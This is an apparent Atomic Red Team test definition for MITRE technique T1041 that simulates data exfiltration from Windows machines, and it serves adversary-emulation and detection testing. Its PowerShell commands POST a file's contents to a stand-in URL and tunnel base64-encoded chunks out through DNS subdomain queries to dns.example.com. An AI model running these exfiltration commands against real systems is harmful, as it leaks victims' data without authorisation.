sai prashanth pulisetti
a5a1cf78fb
* Update T1041.yaml DNS-Based C2 Data Exfiltration Simulates an adversary using DNS tunneling to exfiltrate data over a Command and Control (C2) channel. * Update T1041.yaml updated the changes as requested --------- Co-authored-by: Hare Sudhan <code@0x6c.dev> Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
64 lines
2.1 KiB
YAML
64 lines
2.1 KiB
YAML
attack_technique: T1041
|
|
display_name: 'Exfiltration Over C2 Channel'
|
|
atomic_tests:
|
|
- name: C2 Data Exfiltration
|
|
auto_generated_guid: d1253f6e-c29b-49dc-b466-2147a6191932
|
|
description: |
|
|
Exfiltrates a file present on the victim machine to the C2 server.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
destination_url:
|
|
description: Destination URL to post encoded data.
|
|
type: string
|
|
default: example.com
|
|
filepath:
|
|
description: The file which is being exfiltrated to the C2 Server.
|
|
type: path
|
|
default: $env:TEMP\LineNumbers.txt
|
|
executor:
|
|
command: |
|
|
if(-not (Test-Path #{filepath})){
|
|
1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
|
|
}
|
|
[System.Net.ServicePointManager]::Expect100Continue = $false
|
|
$filecontent = Get-Content -Path #{filepath}
|
|
Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive
|
|
name: powershell
|
|
|
|
- name: Text Based Data Exfiltration using DNS subdomains
|
|
auto_generated_guid: c9207f3e-213d-4cc7-ad2a-7697a7237df9
|
|
description: |
|
|
Simulates an adversary using DNS tunneling to exfiltrate data over a Command and Control (C2) channel.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
dns_server:
|
|
description: DNS server IP address or domain name.
|
|
type: url
|
|
default: dns.example.com
|
|
exfiltrated_data:
|
|
description: Data to be exfiltrated.
|
|
type: string
|
|
default: SecretDataToExfiltrate
|
|
chunk_size:
|
|
description: Size of each DNS query chunk (in characters).
|
|
type: integer
|
|
default: 63
|
|
executor:
|
|
command: |
|
|
$dnsServer = "#{dns_server}"
|
|
$exfiltratedData = "#{exfiltrated_data}"
|
|
$chunkSize = #{chunk_size}
|
|
|
|
$encodedData = [System.Text.Encoding]::UTF8.GetBytes($exfiltratedData)
|
|
$encodedData = [Convert]::ToBase64String($encodedData)
|
|
$chunks = $encodedData -split "(.{$chunkSize})"
|
|
|
|
foreach ($chunk in $chunks) {
|
|
$dnsQuery = $chunk + "." + $dnsServer
|
|
Resolve-DnsName -Name $dnsQuery
|
|
Start-Sleep -Seconds 5
|
|
}
|
|
name: powershell
|